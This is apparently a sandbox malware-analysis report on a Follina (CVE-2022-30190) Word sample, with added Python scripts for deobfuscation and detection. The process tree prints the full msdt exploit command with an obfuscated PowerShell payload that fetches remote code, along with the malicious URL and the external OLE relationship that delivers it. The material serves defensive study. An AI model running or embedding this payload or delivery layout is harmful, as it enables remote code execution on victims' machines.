
Windows Analysis Report
qoIZSkdejM.docx

Overview

General Information

Sample Name:qoIZSkdejM.docx
Analysis ID:686090
MD5:0d37337ead8492e1b2395f6cd4f724fc
SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
Tags:docx

Detection

Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 4788 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5572 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 5472 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO" MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 5964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 1504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2708 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
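The IT_BrowseForFile value in the msdt.exe command line above carries a PowerShell $( ... ) subexpression, which the PCWDiagnostic troubleshooter script evaluates when it builds its file path; the payload inside is wrapped in three layers ('literal'+[char]N concatenation, Base64, then the -f format operator). The following Python script is an added example, not part of the Joe Sandbox report: it folds those layers statically, executes nothing, and works only from the command line recorded in the tree. Function and stage names are the example's own.

```python
"""Static deobfuscation of the msdt.exe command line from the process tree above.

Added example; it is not part of the Joe Sandbox report and executes nothing. It parses the
ms-msdt: URI, pulls the PowerShell $( ... ) subexpression injected into IT_BrowseForFile and
folds the obfuscation layers statically: 'literal'+[char]N concatenation, Base64, and the
-f string-format operator.
"""
from __future__ import annotations

import base64
import re

# Copied from the msdt.exe entry (PID 5472) in the process tree.
MSDT_CMDLINE = r'''"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"'''


def msdt_params(cmdline: str) -> dict[str, str]:
    """IT_* key/value pairs handed to the troubleshooter via /param (no value contains whitespace here)."""
    return dict(re.findall(r"(IT_\w+)=(\S+)", cmdline))


def powershell_subexpressions(text: str) -> list[str]:
    """Every $( ... ) subexpression in text, cut at the parenthesis that balances its opening one."""
    found, i = [], 0
    while (start := text.find("$(", i)) != -1:
        depth, end = 0, -1
        for j in range(start + 1, len(text)):
            depth += {"(": 1, ")": -1}.get(text[j], 0)
            if depth == 0:
                end = j
                break
        if end == -1:          # unbalanced: stop rather than guess
            break
        found.append(text[start:end + 1])
        i = end + 1
    return found


def fold_char_concat(ps: str) -> str:
    """Collapse a 'literal'+[char]N+'literal'... chain into the string PowerShell would build."""
    parts = re.findall(r"'([^']*)'|\[char\](\d+)", ps)
    return "".join(chr(int(code)) if code else lit for lit, code in parts)


def apply_format_operator(ps: str) -> str:
    """Resolve 'template' -f 'a','b',... (PowerShell's format operator) for plain {n} placeholders."""
    m = re.search(r"'([^']*)'\s*-f\s*((?:'[^']*'\s*,?\s*)+)", ps)
    if not m:
        return ps
    args = re.findall(r"'([^']*)'", m.group(2))
    return ps[: m.start()] + m.group(1).format(*args) + ps[m.end():]


def unwrap_iex(ps: str) -> str:
    """Peel nested iex( ... ) / Invoke-Expression( ... ) wrappers down to the innermost command."""
    while (m := re.fullmatch(r"\s*(?:iex|Invoke-Expression)\s*\((.*)\)\s*", ps, re.I | re.S)):
        ps = m.group(1)
    return ps.strip()


def deobfuscate(cmdline: str) -> dict[str, str]:
    """Return each intermediate stage of the injected payload, keyed by stage name."""
    params = msdt_params(cmdline)
    injected = powershell_subexpressions(params.get("IT_BrowseForFile", ""))
    if not injected:
        return {"verdict": "no PowerShell subexpression in IT_BrowseForFile"}
    stage1 = fold_char_concat(injected[0])            # [System.Text.Encoding]::UTF8.GetString(...)
    b64 = re.search(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', stage1).group(1)
    stage2 = base64.b64decode(b64).decode("utf-8")    # a second iex with a -f template
    stage3 = apply_format_operator(stage2)
    return {
        "diagnostic_pack": re.search(r"/id\s+(\S+)", cmdline).group(1),
        "injected_subexpression": injected[0],
        "stage1_decoder": stage1,
        "stage2_after_base64": stage2,
        "stage3_after_format": stage3,
        "final_command": unwrap_iex(stage3),
    }


if __name__ == "__main__":
    for stage, value in deobfuscate(MSDT_CMDLINE).items():
        print(f"{stage}: {value}")
```

The trailing path traversal to Windows/System32/mpsigstub.exe is kept in the parsed value untouched: the subexpression is evaluated before the path is used, and the rest of the string only has to look like a real file. The folding functions deliberately handle just the constructs present in this sample; anything they do not recognise is returned unchanged rather than guessed.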
Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x38:$a1: <Relationships
  • 0x2b5:$a2: TargetMode="External"
  • 0x2ad:$x1: .html!

Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x26d:$olerel: relationships/oleObject
  • 0x286:$target1: Target="http
  • 0x2b5:$mode: TargetMode="External
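Both rules above key on the same strings in word/_rels/document.xml.rels: an oleObject relationship, an http(s) target and TargetMode="External", with the first rule also looking for the trailing ".html!". The following Python script is an added example, not part of the report or of either rule set; it reads the relationship parts straight out of the OOXML zip with the standard library and reports the same indicators. The .docx it builds in memory is constructed for the example and only mirrors that relationship layout, with the target taken from the "Extracted files from sample" line of this report; it is not the analysed sample.

```python
"""Static triage of a .docx package for the external OLE relationship the rules above matched.

Added example; it is not part of the Joe Sandbox report or the Yara rules. It reads every
.rels part from the OOXML zip, keeps the relationships marked TargetMode="External", and
applies the indicators the rules key on: an oleObject/attachedTemplate relationship pointing
at a remote URL, a trailing "!" on the target, and an HTML document as the target.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(docx_bytes: bytes):
    """Yield (part name, relationship type, target) for each TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    yield name, rel.get("Type", ""), rel.get("Target", "")


def follina_indicators(docx_bytes: bytes) -> list:
    """Return one finding per external relationship that looks like a remote OLE/template load."""
    findings = []
    for part, rtype, target in external_relationships(docx_bytes):
        kind = rtype.rsplit("/", 1)[-1]
        if kind == "hyperlink":                 # ordinary links are External by design
            continue
        reasons = []
        if kind in ("oleObject", "attachedTemplate") and re.match(r"(https?://|mhtml:)", target, re.I):
            reasons.append(f"{kind} loaded from a remote URL")
        if target.endswith("!"):
            reasons.append("target ends in '!' as in the Follina samples")
        if re.search(r"\.html?(\W|$)", target, re.I):
            reasons.append("target is an HTML document")
        if reasons:
            findings.append({"part": part, "type": kind, "target": target, "reasons": reasons})
    return findings


def build_sample_docx(target: str, mode: str = "External") -> bytes:
    """Constructed minimal .docx (NOT the analysed sample) whose document.xml.rels mirrors the
    layout the rules matched: an oleObject relationship next to a harmless hyperlink."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OOXML_REL}oleObject" Target="{target}" TargetMode="{mode}"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Target taken from the "Extracted files from sample" line of this report.
    for finding in follina_indicators(build_sample_docx("https://www.malwarejake.com/456.html!")):
        print(finding)
```

Parsing the XML rather than grepping the bytes means the check is not defeated by attribute reordering, single quotes or extra whitespace, which a byte-pattern rule tolerates only as far as its strings allow; hyperlink relationships are skipped because every ordinary link in a document is an external relationship.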
PCAP (Network Traffic)

Source: sslproxydump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x104682:$a: PCWDiagnostic
  • 0x104676:$sa3: ms-msdt
  • 0x1046f5:$sb3: IT_BrowseForFile=

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198c:$a: PCWDiagnostic
  • 0x1980:$sa3: ms-msdt
  • 0x19ff:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x196f:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x198c:$a: PCWDiagnostic
  • 0x1980:$sa3: ms-msdt
  • 0x19ff:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x196f:$re1: location.href = "ms-msdt:
Memory Dumps

Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x1cec:$a: PCWDiagnostic
  • 0x3813:$a: PCWDiagnostic
  • 0x1c84:$sa1: msdt.exe
  • 0x1cc0:$sa1: msdt.exe
  • 0x20ca:$sa1: msdt.exe
  • 0x37fd:$sa1: msdt.exe
  • 0x1cd4:$sa3: ms-msdt
  • 0x3807:$sa3: ms-msdt
  • 0x1dd0:$sb3: IT_BrowseForFile=
  • 0x3885:$sb3: IT_BrowseForFile=

Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x53ce:$a: PCWDiagnostic
  • 0x94be:$a: PCWDiagnostic
  • 0x1627c:$a: PCWDiagnostic
  • 0xddc:$sa1: msdt.exe
  • 0x87d8:$sa1: msdt.exe
  • 0x18906:$sa1: msdt.exe
  • 0x194c0:$sa1: msdt.exe
  • 0x191b8:$sb3: IT_BrowseForFile=

Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x28b2:$a: PCWDiagnostic
  • 0x2888:$sa1: msdt.exe
  • 0x289a:$sa3: ms-msdt
  • 0x2994:$sb3: IT_BrowseForFile=

Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Sigma Overview

No Sigma rule has matched

Snort Overview

No Snort rule has matched


AV Detection

Source: qoIZSkdejM.docx | Virustotal: Detection: 35%
Source: qoIZSkdejM.docx | Metadefender: Detection: 22%
Source: qoIZSkdejM.docx | ReversingLabs: Detection: 44%
Source: qoIZSkdejM.docx | Avira: detected
Source: https://www.malwarejake.com/456.html | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm | Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://www.malwarejake.com/456.html!
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49744 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | DNS query: name: www.malwarejake.com
Source: global traffic | DNS query: name: www.malwarejake.com
Source: global traffic | TCP traffic: 192.168.2.4 <-> 143.198.109.79:443, twelve connections from client ports 49741, 49742, 49743, 49744, 49745, 49746, 49747, 49748, 49749, 49750, 49751 and 49756, with packets in both directions on each connection
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: Joe Sandbox View | ASN Name: LDCOMNETFR LDCOMNETFR
          Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic | HTTP traffic detected:
              GET /456.html HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
              Accept-Encoding: gzip, deflate
              Host: www.malwarejake.com
              Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected:
              GET /456.html HTTP/1.1
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
              Accept-Encoding: gzip, deflate
              Host: www.malwarejake.com
              If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
              If-None-Match: "1b90-5e045198f8aaa"
              Connection: Keep-Alive
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://osi.office.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com/
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drString found in binary or memory: https://outlook.office365.com
